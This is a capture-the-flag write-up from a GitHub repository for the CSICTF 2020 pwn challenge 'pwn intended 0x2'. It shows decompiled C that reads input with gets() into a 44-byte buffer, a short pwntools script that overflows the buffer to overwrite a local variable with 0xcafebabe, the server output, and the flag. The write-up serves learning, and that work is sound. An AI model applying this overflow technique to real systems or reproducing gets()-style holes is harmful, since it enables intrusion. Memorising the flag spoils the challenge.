CSICTF-Writeups/Pwn/pwn intended 0x2
rishitsaiya 88ee32973e Added Pwn Challenges 2020-07-31 18:24:27 +05:30
..
README.md Added Pwn Challenges 2020-07-31 18:24:27 +05:30
pwn-intended-0x2 Added Pwn Challenges 2020-07-31 18:24:27 +05:30
rev_exploit.py Added Pwn Challenges 2020-07-31 18:24:27 +05:30

README.md

pwn-intended-0x2

The main idea finding the flag is overwrite the correct hex after padding.

Step-1:

After I downloaded pwn-intended-0x2, I reversed it with IDA, I got this source code:

undefined8 main(void)

{
  char local_38 [44];
  int local_c;

  local_c = 0;
  setbuf(stdout,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  puts("Welcome to csictf! Where are you headed?");
  gets(local_38);
  puts("Safe Journey!");
  if (local_c == -0x35014542) {
    puts("You\'ve reached your destination, here\'s a flag!");
    system("/bin/cat flag.txt");
  }
  return 0;
}

Step-2:

local_c is checked for a hex value of 0xcafebabe. Since the size of local array is 44, we have to write 0xcafebabe after 44 bytes.

Step-3:

I wrote a very common rev_exploit.py to pwn into the machine.

import pwn

r = pwn.remote('chall.csivit.com', 30007)

payload = "A"*44 + '\xbe\xba\xfe\xca'

r.sendline(payload)
r.interactive()

Step-4:

When I finally ran this python3 rev_exploit.py, I got this output:

[+] Opening connection to chall.csivit.com on port 30007: Done
[*] Switching to interactive mode
Welcome to csictf! Where are you headed?
Safe Journey!
You've reached your destination, here's a flag!
csictf{c4n_y0u_re4lly_telep0rt?}[*] Got EOF while reading in interactive 
$
[*] Interrupted

Voila! I got the flag there.

Step-5:

Finally the flag becomes: csictf{c4n_y0u_re4lly_telep0rt?}